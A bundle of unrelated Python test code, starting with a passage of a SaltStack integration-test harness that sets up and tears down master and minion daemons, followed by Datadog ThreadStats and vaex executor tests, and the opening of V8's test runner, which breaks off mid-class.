            if not os.path.exists(new_extension_modules_path):
                shutil.copytree(
                    os.path.join(
                        INTEGRATION_TEST_DIR, 'files', 'extension_modules'
                    ),
                    new_extension_modules_path
                )
            opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')

        # Point the config values to the correct temporary paths
        for name in ('hosts', 'aliases'):
            optname = '{0}.file'.format(name)
            optname_path = os.path.join(TMP, name)
            master_opts[optname] = optname_path
            minion_opts[optname] = optname_path
            sub_minion_opts[optname] = optname_path
            syndic_opts[optname] = optname_path
            syndic_master_opts[optname] = optname_path

        # Every daemon gets its own free localhost port for the runtests
        # connection check
        master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
        minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
        sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
        syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
        syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()

        for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts):
            if 'engines' not in conf:
                conf['engines'] = []
            conf['engines'].append({'salt_runtests': {}})
            if 'engines_dirs' not in conf:
                conf['engines_dirs'] = []
            conf['engines_dirs'].insert(0, ENGINES_DIR)
            if 'log_handlers_dirs' not in conf:
                conf['log_handlers_dirs'] = []
            conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
            conf['runtests_log_port'] = SALT_LOG_PORT

        # ----- Transcribe Configuration ---------------------------------------------------------------------------->
        for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
            if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'):
                # These have runtime computed values and will be handled
                # differently
                continue
            entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
            if os.path.isfile(entry_path):
                shutil.copy(
                    entry_path,
                    os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
                )
            elif os.path.isdir(entry_path):
                shutil.copytree(
                    entry_path,
                    os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
                )

        for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'):
            # Look up the matching <entry>_opts dict built above
            computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
            with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
                fp_.write(yaml.dump(computed_config, default_flow_style=False))
        sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
        with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
            wfh.write(
                yaml.dump(sub_minion_computed_config, default_flow_style=False)
            )
        shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'),
                        os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
        syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
        with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
            wfh.write(
                yaml.dump(syndic_master_computed_config, default_flow_style=False)
            )
        syndic_computed_config = copy.deepcopy(syndic_opts)
        with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
            wfh.write(
                yaml.dump(syndic_computed_config, default_flow_style=False)
            )
        shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'),
                        os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
        # <---- Transcribe Configuration -----------------------------------------------------------------------------

        # ----- Verify Environment ---------------------------------------------------------------------------------->
        # Reload the freshly written files so defaults/derived values are
        # computed by salt.config itself
        master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
        minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
        syndic_opts = salt.config.syndic_config(
            os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
            os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
        )
        sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
        syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))

        RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
        RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
        RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
        RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
        RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)

        verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
                    os.path.join(master_opts['pki_dir'], 'minions_pre'),
                    os.path.join(master_opts['pki_dir'], 'minions_rejected'),
                    os.path.join(master_opts['pki_dir'], 'minions_denied'),
                    os.path.join(master_opts['cachedir'], 'jobs'),
                    os.path.join(master_opts['cachedir'], 'raet'),
                    os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
                    os.path.join(syndic_master_opts['pki_dir'], 'minions'),
                    os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
                    os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
                    os.path.join(syndic_master_opts['cachedir'], 'jobs'),
                    os.path.join(syndic_master_opts['cachedir'], 'raet'),
                    os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
                    os.path.join(master_opts['pki_dir'], 'accepted'),
                    os.path.join(master_opts['pki_dir'], 'rejected'),
                    os.path.join(master_opts['pki_dir'], 'pending'),
                    os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
                    os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
                    os.path.join(syndic_master_opts['pki_dir'], 'pending'),
                    os.path.join(syndic_master_opts['cachedir'], 'raet'),
                    os.path.join(minion_opts['pki_dir'], 'accepted'),
                    os.path.join(minion_opts['pki_dir'], 'rejected'),
                    os.path.join(minion_opts['pki_dir'], 'pending'),
                    os.path.join(minion_opts['cachedir'], 'raet'),
                    os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
                    os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
                    os.path.join(sub_minion_opts['pki_dir'], 'pending'),
                    os.path.join(sub_minion_opts['cachedir'], 'raet'),
                    os.path.dirname(master_opts['log_file']),
                    minion_opts['extension_modules'],
                    sub_minion_opts['extension_modules'],
                    sub_minion_opts['pki_dir'],
                    master_opts['sock_dir'],
                    syndic_master_opts['sock_dir'],
                    sub_minion_opts['sock_dir'],
                    minion_opts['sock_dir'],
                    RUNTIME_VARS.TMP_STATE_TREE,
                    RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
                    TMP,
                    ],
                   RUNTIME_VARS.RUNNING_TESTS_USER)

        cls.master_opts = master_opts
        cls.minion_opts = minion_opts
        cls.sub_minion_opts = sub_minion_opts
        cls.syndic_opts = syndic_opts
        cls.syndic_master_opts = syndic_master_opts
        # <---- Verify Environment -----------------------------------------------------------------------------------

    def __exit__(self, type, value, traceback):
        '''
        Kill the minion and master processes
        '''
        self.sub_minion_process.terminate()
        self.minion_process.terminate()
        self.master_process.terminate()
        # syndic/syndic-master may not have been started; ignore missing attrs
        try:
            self.syndic_process.terminate()
        except AttributeError:
            pass
        try:
            self.smaster_process.terminate()
        except AttributeError:
            pass
        #salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50)
        #self.sub_minion_process.join()
        #salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50)
        #self.minion_process.join()
        #salt.utils.process.clean_proc(self.master_process, wait_for_kill=50)
        #self.master_process.join()
        #try:
        #    salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50)
        #    self.syndic_process.join()
        #except AttributeError:
        #    pass
        #try:
        #    salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50)
        #    self.smaster_process.join()
        #except AttributeError:
        #    pass
        self.log_server.server_close()
        self.log_server.shutdown()
        self._exit_mockbin()
        self._exit_ssh()
        self.log_server_process.join()
        # Shutdown the multiprocessing logging queue listener
        salt_log_setup.shutdown_multiprocessing_logging()
        salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)

    def pre_setup_minions(self):
        '''
        Subclass this method for additional minion setups.
        '''

    def setup_minions(self):
        '''
        Minions setup routines
        '''

    def post_setup_minions(self):
        '''
        Subclass this method to execute code after the minions have been setup
        '''

    def _enter_mockbin(self):
        # Prepend the mock binaries directory to PATH so tests resolve the
        # mocked commands before the real ones. Undone by _exit_mockbin().
        path = os.environ.get('PATH', '')
        path_items = path.split(os.pathsep)
        if MOCKBIN not in path_items:
            path_items.insert(0, MOCKBIN)
        os.environ['PATH'] = os.pathsep.join(path_items)

    def _exit_ssh(self):
        '''
        Stop the sshd started by prep_ssh(): first via the Popen handle,
        then via the PID recorded in the pidfile.
        '''
        if hasattr(self, 'sshd_process'):
            try:
                self.sshd_process.kill()
            except OSError as exc:
                # errno 3 == ESRCH (no such process): it already exited
                if exc.errno != 3:
                    raise
            with salt.utils.fopen(self.sshd_pidfile) as fhr:
                try:
                    os.kill(int(fhr.read()), signal.SIGKILL)
                except OSError as exc:
                    if exc.errno != 3:
                        raise

    def _exit_mockbin(self):
        # Reverse _enter_mockbin(): drop MOCKBIN from PATH if present
        path = os.environ.get('PATH', '')
        path_items = path.split(os.pathsep)
        try:
            path_items.remove(MOCKBIN)
        except ValueError:
            pass
        os.environ['PATH'] = os.pathsep.join(path_items)

    @classmethod
    def clean(cls):
        '''
        Clean out the tmp files
        '''
        def remove_readonly(func, path, excinfo):
            # Give full permissions to owner
            os.chmod(path, stat.S_IRWXU)
            func(path)

        for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
            if os.path.isdir(dirname):
                shutil.rmtree(dirname, onerror=remove_readonly)

    def wait_for_jid(self, targets, jid, timeout=120):
        '''
        Poll ``saltutil.running`` on ``targets`` until job ``jid`` stops
        showing up two polls in a row, or ``timeout`` seconds elapse.
        Returns True once the job is finished, False on timeout.
        '''
        time.sleep(1)  # Allow some time for minions to accept jobs
        now = datetime.now()
        expire = now + timedelta(seconds=timeout)
        job_finished = False
        while now <= expire:
            running = self.__client_job_running(targets, jid)
            # Clear the current status line before rewriting it
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns', PNUM)
                )
            )
            if not running and job_finished is False:
                # Let's not have false positives and wait one more seconds
                job_finished = True
            elif not running and job_finished is True:
                return True
            elif running and job_finished is True:
                job_finished = False

            if job_finished is False:
                sys.stdout.write(
                    ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                        '{0}'.format(expire - now).rsplit('.', 1)[0],
                        ', '.join(running),
                        **self.colors
                    )
                )
                sys.stdout.flush()
            time.sleep(1)
            now = datetime.now()
        else:  # pylint: disable=W0120
            # while-else: only reached when the loop expires without returning
            sys.stdout.write(
                '\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
                'back\n'.format(**self.colors)
            )
            sys.stdout.flush()
        return False

    def __client_job_running(self, targets, jid):
        # Return the targets that still report ``jid`` in saltutil.running
        running = self.client.cmd(
            list(targets), 'saltutil.running', tgt_type='list'
        )
        return [
            k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
        ]

    def wait_for_minion_connections(self, targets, timeout):
        '''
        ``test.ping`` the expected minions until every one of them answers or
        ``timeout`` seconds elapse; aborts the whole test run (SystemExit) on
        failure.
        '''
        salt.utils.appendproctitle('WaitForMinionConnections')
        sys.stdout.write(
            ' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
            'connect back\n'.format(
                (timeout > 60 and timedelta(seconds=timeout) or '{0} secs'.format(timeout)),
                ', '.join(targets),
                **self.colors
            )
        )
        sys.stdout.flush()
        expected_connections = set(targets)
        now = datetime.now()
        expire = now + timedelta(seconds=timeout)
        while now <= expire:
            # Clear and redraw the countdown/status line
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns', PNUM)
                )
            )
            sys.stdout.write(
                ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                    '{0}'.format(expire - now).rsplit('.', 1)[0],
                    ', '.join(expected_connections),
                    **self.colors
                )
            )
            sys.stdout.flush()

            try:
                responses = self.client.cmd(
                    list(expected_connections), 'test.ping', tgt_type='list',
                )
                # we'll get this exception if the master process hasn't finished starting yet
            except SaltClientError:
                time.sleep(0.1)
                now = datetime.now()
                continue
            for target in responses:
                if target not in expected_connections:
                    # Someone(minion) else "listening"?
                    continue
                expected_connections.remove(target)
                sys.stdout.write(
                    '\r{0}\r'.format(
                        ' ' * getattr(self.parser.options, 'output_columns', PNUM)
                    )
                )
                sys.stdout.write(
                    ' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
                        target, **self.colors
                    )
                )
                sys.stdout.flush()

            if not expected_connections:
                return

            time.sleep(1)
            now = datetime.now()
        else:  # pylint: disable=W0120
            print(
                '\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
                'back. Tests requiring them WILL fail'.format(**self.colors)
            )
            try:
                print_header(
                    '=', sep='=', inline=True,
                    width=getattr(self.parser.options, 'output_columns', PNUM)
                )
            except TypeError:
                print_header('=', sep='=', inline=True)
            raise SystemExit()

    def sync_minion_modules_(self, modules_kind, targets, timeout=None):
        '''
        Run ``saltutil.sync_<modules_kind>`` on ``targets`` and wait for
        every minion to report back. Aborts the test run (SystemExit) when
        the sync job times out; returns False when a minion reports an
        error, True otherwise.
        '''
        if not timeout:
            timeout = 120
        # Let's sync all connected minions
        print(
            ' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
            '(saltutil.sync_{1})'.format(
                ', '.join(targets),
                modules_kind,
                **self.colors
            )
        )
        syncing = set(targets)
        jid_info = self.client.run_job(
            list(targets), 'saltutil.sync_{0}'.format(modules_kind),
            tgt_type='list',
            timeout=999999999999999,
        )
        if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
            print(
                ' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
                'Tests requiring these {0} WILL fail'.format(modules_kind, **self.colors)
            )
            raise SystemExit()

        while syncing:
            rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
            if rdata:
                for name, output in six.iteritems(rdata):
                    if not output['ret']:
                        # Already synced!?
                        syncing.remove(name)
                        continue

                    if isinstance(output['ret'], six.string_types):
                        # An error has occurred: the return is the error string
                        print(
                            ' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
                            '{1}'.format(
                                name, output['ret'], modules_kind, **self.colors)
                        )
                        return False

                    print(
                        ' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
                        '{1}'.format(
                            name, ', '.join(output['ret']), modules_kind, **self.colors
                        )
                    )
                    # Synced!
                    try:
                        syncing.remove(name)
                    except KeyError:
                        print(
                            ' {LIGHT_RED}*{ENDC} {0} already synced??? '
                            '{1}'.format(name, output, **self.colors)
                        )
        return True

    def sync_minion_states(self, targets, timeout=None):
        # Thin wrapper: sync state modules
        salt.utils.appendproctitle('SyncMinionStates')
        self.sync_minion_modules_('states', targets, timeout=timeout)

    def sync_minion_modules(self, targets, timeout=None):
        # Thin wrapper: sync execution modules
        salt.utils.appendproctitle('SyncMinionModules')
        self.sync_minion_modules_('modules', targets, timeout=timeout)

    def sync_minion_grains(self, targets, timeout=None):
        # Thin wrapper: sync grains modules
        salt.utils.appendproctitle('SyncMinionGrains')
        self.sync_minion_modules_('grains', targets, timeout=timeout)
test_threadstats_thread_safety.py
import re
import time
import threading

from nose import tools as t

from datadog import ThreadStats


class MemoryReporter(object):
    """ A reporting class that reports to memory for testing. """

    def __init__(self):
        self.metrics = []
        self.events = []

    def flush_metrics(self, metrics):
        # Accumulate in memory instead of shipping to the API
        self.metrics += metrics

    def flush_events(self, events):
        self.events += events


class ThreadStatsTest(ThreadStats):
    """ThreadStats whose worker method emits one of each metric type."""

    def send_metrics_and_event(self, id):
        """Send a counter, a gauge, a histogram sample and an event, sleeping
        between calls so the OS is encouraged to switch threads mid-sequence."""
        # Counter
        self.increment("counter", timestamp=12345)
        time.sleep(0.001)  # sleep makes the os continue another thread

        # Gauge
        self.gauge("gauge_" + str(id), 42)
        time.sleep(0.001)  # sleep makes the os continue another thread

        # Histogram
        self.histogram("histogram", id, timestamp=12345)
        time.sleep(0.001)  # sleep makes the os continue another thread

        # Event
        self.event("title", "content")


class TestThreadStatsThreadSafety(object):

    def test_threadstats_thread_safety(self):
        """Hammer one ThreadStats instance from 10000 threads and verify no
        data point is lost or duplicated after a single flush."""
        stats = ThreadStatsTest()
        stats.start(roll_up_interval=10, flush_in_thread=False)
        reporter = stats.reporter = MemoryReporter()

        for i in range(10000):
            threading.Thread(target=stats.send_metrics_and_event, args=[i]).start()
        # Wait all threads to finish
        time.sleep(10)

        # Flush and check
        stats.flush()
        metrics = reporter.metrics
        events = reporter.events

        # Overview: 1 counter + 10000 gauges + 8 histogram aggregates
        t.assert_equal(len(metrics), 10009, len(metrics))

        # Sort metrics
        counter_metrics = []
        gauge_metrics = []
        histogram_metrics = []
        for m in metrics:
            if re.match("gauge_.*", m['metric']):
                gauge_metrics.append(m)
            elif re.match("histogram.*", m['metric']):
                histogram_metrics.append(m)
            else:
                counter_metrics.append(m)

        # Counter
        t.assert_equal(len(counter_metrics), 1, len(counter_metrics))
        counter = counter_metrics[0]
        t.assert_equal(counter['points'][0][1], 10000, counter['points'][0][1])

        # Gauge
        t.assert_equal(len(gauge_metrics), 10000, len(gauge_metrics))

        # Histogram
        t.assert_equal(len(histogram_metrics), 8, len(histogram_metrics))
        # BUG FIX: this used filter(...)[0], which breaks on Python 3 where
        # filter() returns a non-subscriptable iterator. A list comprehension
        # behaves identically on both Python 2 and 3.
        count_histogram = [m for m in histogram_metrics if m['metric'] == "histogram.count"][0]
        t.assert_equal(count_histogram['points'][0][1], 10000, count_histogram['points'][0][1])
        # Renamed from the misleading `sum_histogram`: this is the avg metric.
        avg_histogram = [m for m in histogram_metrics if m['metric'] == "histogram.avg"][0]
        t.assert_equal(avg_histogram['points'][0][1], 4999.5, avg_histogram['points'][0][1])

        # Events
        t.assert_equal(10000, len(events), len(events))
execution_test.py
from unittest.mock import MagicMock
from concurrent.futures import ThreadPoolExecutor
import concurrent.futures
import platform
import threading

import pytest
import numpy as np
from common import small_buffer
import vaex


def test_evaluate_expression_once():
    """A virtual column used by two delayed tasks is evaluated only once."""
    calls = 0

    def add(a, b):
        nonlocal calls
        if len(a) > 1:  # skip dtype calls
            calls += 1
        return a + b

    x = np.arange(5)
    y = x**2
    df = vaex.from_arrays(x=x, y=y)
    df.add_function('add', add)
    df['z'] = df.func.add(df.x, df.y)
    df.executor.passes = 0
    df.z.sum(delay=True)
    df._set('z', delay=True)
    calls = 0
    df.execute()
    assert df.executor.passes == 1
    assert calls == 1


def test_nested_use_of_executor():
    """The executor can be re-entered from a delayed callback."""
    df = vaex.from_scalars(x=1, y=2)

    @vaex.delayed
    def next(x):
        # although the executor is still in its loop, it's not using the threads anymore
        # so we should be able to use the executor again
        return x + df.y.sum()

    value = next(df.x.sum(delay=True))
    df.execute()
    assert value.get() == 1 + 2


def test_passes_two_datasets():
    """Tasks over different datasets need separate passes over the data."""
    df1 = vaex.from_scalars(x=1, y=2)
    df2 = vaex.from_scalars(x=1, y=3)
    executor = df1.executor
    executor.passes = 0
    df1.sum('x')
    assert executor.passes == 1

    df1.sum('x', delay=True)
    df2.sum('x', delay=True)
    df1.execute()
    assert executor.passes == 3


def test_passes_two_datasets_different_vars():
    """Same dataset with different variable values still fuses into one pass."""
    x = np.array([2.])
    y = x**2
    dataset = vaex.dataset.DatasetArrays(x=x, y=y)
    df1 = vaex.from_dataset(dataset)
    df2 = vaex.from_dataset(dataset)
    df1.variables['a'] = 1
    df2.variables['a'] = 2
    df1['z'] = 'x + y * a'
    df2['z'] = 'x + y * a'
    executor = df1.executor
    executor.passes = 0
    s1 = df1.sum('z', delay=True)
    s2 = df2.sum('z', delay=True)
    df1.execute()
    assert executor.passes == 1
    assert s1.get() == 2 + 4 * 1
    assert s2.get() == 2 + 4 * 2


def test_passes_two_datasets_different_expressions():
    """Different expressions over the same dataset share a single pass."""
    x = np.array([2.])
    y = x**2
    dataset = vaex.dataset.DatasetArrays(x=x, y=y)
    df1 = vaex.from_dataset(dataset)
    df2 = vaex.from_dataset(dataset)
    df1['a'] = 'x * y'
    df2['b'] = 'x + y'
    executor = df1.executor
    executor.passes = 0
    s1 = df1.sum('a', delay=True)
    s2 = df2.sum('b', delay=True)
    df1.execute()
    assert executor.passes == 1
    assert s1.get() == 2 * 4
    assert s2.get() == 2 + 4


def test_passes_filtering():
    """Two differently filtered views of one df are computed in one pass."""
    x = np.arange(10)
    df = vaex.from_arrays(x=x, y=x**2)
    df1 = df[df.x < 4]
    df2 = df[df.x > 7]
    executor = df.executor
    executor.passes = 0
    result1 = df1.sum('x', delay=True)
    result2 = df2.sum('x', delay=True)
    df.execute()
    assert executor.passes == 1
    assert result1.get() == 1 + 2 + 3
    assert result2.get() == 8 + 9


def test_multiple_tasks_different_columns_names():
    """Delayed tasks on different columns of different dfs both resolve."""
    df1 = vaex.from_scalars(x=1, y=2)
    df2 = vaex.from_scalars(x=1, y=2)
    x = df1.sum('x', delay=True)
    y = df2.sum('y', delay=True)
    df1.execute()
    assert x.get() == 1
    assert y.get() == 2


def test_merge_aggregation_tasks():
    """Aggregation tasks with equal (but distinct) binners merge into one."""
    df = vaex.from_arrays(x=[1, 2], y=[2, 3])
    binners = df._create_binners('x', [0.5, 2.5], 2)
    binners2 = df._create_binners('x', [0.5, 2.5], 2)
    assert len(binners) == 1
    vaex.agg.count().add_tasks(df, binners)
    assert len(df.executor.tasks) == 1
    # binners compare equal but are not the same objects
    assert binners is not binners2
    assert binners[0] is not binners2[0]
    assert binners == binners2
    assert binners[0] == binners2[0]
    vaex.agg.sum('y').add_tasks(df, binners)
    assert len(df.executor.tasks) == 2
    tasks = df.executor._pop_tasks()
    assert len(tasks) == 2
    tasks = vaex.execution._merge_tasks_for_df(tasks, df)
    assert len(tasks) == 1
    assert isinstance(tasks[0], vaex.tasks.TaskAggregations)


def test_merge_same_aggregation_tasks():
    """Identical aggregations dedupe to the same task and the same result."""
    df = vaex.from_arrays(x=[1, 2], y=[2, 3])
    binners = df._create_binners('x', [0.5, 2.5], 2)
    binners2 = df._create_binners('x', [0.5, 2.5], 2)
    assert len(binners) == 1
    # these two aggregations should be merged into 1 subtask
    [task1], result1 = vaex.agg.count().add_tasks(df, binners)
    [task2], result2 = vaex.agg.count().add_tasks(df, binners)
    assert len(df.executor.tasks) == 1
    df.execute()
    assert task1 is task2
    assert np.all(result1.get() == result2.get())


def test_signals(df):
    """begin/progress/end signals fire exactly as expected during execute."""
    x = np.arange(10)
    y = x**2
    sum_x_expected = x.sum()
    sum_y_expected = y.sum()
    with vaex.cache.off():
        mock_begin = MagicMock()
        mock_progress = MagicMock()
        mock_end = MagicMock()
        len(df)  # ensure we have the filter precomputed
        df.executor.signal_begin.connect(mock_begin)
        df.executor.signal_progress.connect(mock_progress)
        df.executor.signal_end.connect(mock_end)
        sum_x = df.sum(df.x, delay=True)
        sum_y = df.sum(df.y, delay=True)
        df.execute()
        assert sum_x.get() == sum_x_expected
        assert sum_y.get() == sum_y_expected

        mock_begin.assert_called_once()
        mock_progress.assert_called_with(1.0)
        mock_end.assert_called_once()


def test_reentrant_catch(df_local):
    """Triggering a computation from a progress callback raises RuntimeError."""
    with vaex.cache.off():
        df = df_local
        # a 'worker' thread should not be allowed to trigger a new computation
        def progress(fraction):
            print('progress', fraction)
            df.count(df.x)  # enters the executor again

        with pytest.raises(RuntimeError) as exc:
            df.count(df.x, progress=progress)
        assert 'nested' in str(exc.value)


@pytest.mark.skipif(platform.system().lower() == 'windows', reason="hangs appveyor very often, bug?")
def test_thread_safe(df_local):
    """Concurrent count() calls from many threads all return the same value."""
    with vaex.cache.off():
        df = df_local
        # but an executor should be thread safe
        def do():
            return df_local.count(df.x)  # enters the executor from a thread

        count = df_local.count(df.x)
        tpe = ThreadPoolExecutor(4)
        futures = []
        passes = df.executor.passes
        N = 100
        with small_buffer(df):
            for i in range(N):
                futures.append(tpe.submit(do))
            done, not_done = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_EXCEPTION)
            for future in done:
                assert count == future.result()
        assert df.executor.passes <= passes + N


def test_delayed(df):
    """vaex.delayed composes with a delayed aggregation result."""
    with vaex.cache.off():
        @vaex.delayed
        def add(a, b):
            return a + b

        total_promise = add(df.sum(df.x, delay=True), 1)
        df.execute()
        assert total_promise.get() == df.sum(df.x) + 1


def test_nested_task(df):
    """A task scheduled while another task's result is handled still runs."""
    with vaex.cache.off():
        @vaex.delayed
        def add(a, b):
            return a + b

        total_promise = add(df.sum(df.x, delay=True))

        @vaex.delayed
        def next(value):
            # during the handling of the sum task, we add a new task
            sumy_promise = df.sum(df.y, delay=True)
            if df.is_local():
                assert not df.executor.local.executing
            # without calling the executor, since it should still be running its main loop
            return add(sumy_promise, value)

        total_promise = next(df.sum(df.x, delay=True))
        df.execute()
        assert total_promise.get() == df.sum(df.x) + df.sum(df.y)


def test_executor_from_other_thread():
    """execute() may be called from a thread other than the scheduling one."""
    with vaex.cache.off():
        df = vaex.from_arrays(x=[1, 2])

        def execute():
            # but call execute from a different thread
            df.execute()

        # we add a tasks from the main thread, we use binby without limits to force
        # a double computation.
        c = df.count('x', binby='x', delay=True, edges=True)
        thread = threading.Thread(target=execute)
        thread.start()
        thread.join()
        assert sum(c.get()) == 2


# def test_add_and_cancel_tasks(df_executor):
#     df = df_executor
#     def add_task_and_cancel(fraction):
#         df.sum(df.x, delay=True)
#         return False

#     future = df.count(progress=add_task_and_cancel, delay=True)
#     df.execute()
#     with pytest.raises(vaex.execution.UserAbort):
#         future.get()
#     assert df.executor.tasks

# import vaex
# import vaex.dask
# import vaex.ray
# import numpy as np

# @pytest.fixture(params=['executor_dask', 'executor_ray'])
# def executor(request, executor_dask, executor_ray):
#     named = dict(executor_dask=executor_dask, executor_ray=executor_ray)
#     return named[request.param]

# @pytest.fixture(scope='session')
# def executor_ray():
#     return vaex.ray.Executor(chunk_size=2)

# @pytest.fixture(scope='session')
# def executor_dask():
#     return vaex.dask.Executor(chunk_size=2)

# @pytest.fixture
# def df():
#     x = np.arange(10)
#     y = x**2
#     df = vaex.from_arrays(x=x, y=y)
#     return df

# def test_task_sum(df, executor):
#     total = df.x.sum()
#     task = vaex.tasks.TaskSum(df, 'x')
#     # df.executor = None
#     # df._expressions = None
#     # executor = vaex.ray.ExecutorRay()
#     executor.schedule(task)
#     executor.execute()
#     assert task.result == total

# def test_sum(df, executor):
#     total = df.x.sum()
#     df.executor = executor
#     total2 = df.x.sum()
#     assert total == total2
test.py
#!/usr/bin/env python # # Copyright 2012 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import imp
import optparse
import os
from os.path import join, dirname, abspath, basename, isdir, exists
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils

from Queue import Queue, Empty

# Set by ProcessOptions() from the -v/--verbose flag.
VERBOSE = False


# ---------------------------------------------
# --- P r o g r e s s   I n d i c a t o r s ---
# ---------------------------------------------


class ProgressIndicator(object):
  """Base class for progress reporters.

  Holds the shared work queue and counters; subclasses implement the
  Starting/AboutToRun/HasRun/Done display hooks.
  """

  def __init__(self, cases):
    self.cases = cases
    # Thread-safe queue pre-filled with every case; workers drain it.
    self.queue = Queue(len(cases))
    for case in cases:
      self.queue.put_nowait(case)
    self.succeeded = 0
    self.remaining = len(cases)
    self.total = len(cases)
    self.failed = [ ]
    self.crashed = 0
    # Cooperative shutdown flag polled by every worker in RunSingle().
    self.terminate = False
    # Serializes counter updates and display output across workers.
    self.lock = threading.Lock()

  def PrintFailureHeader(self, test):
    """Print the '=== label ===' banner and path for a failed test."""
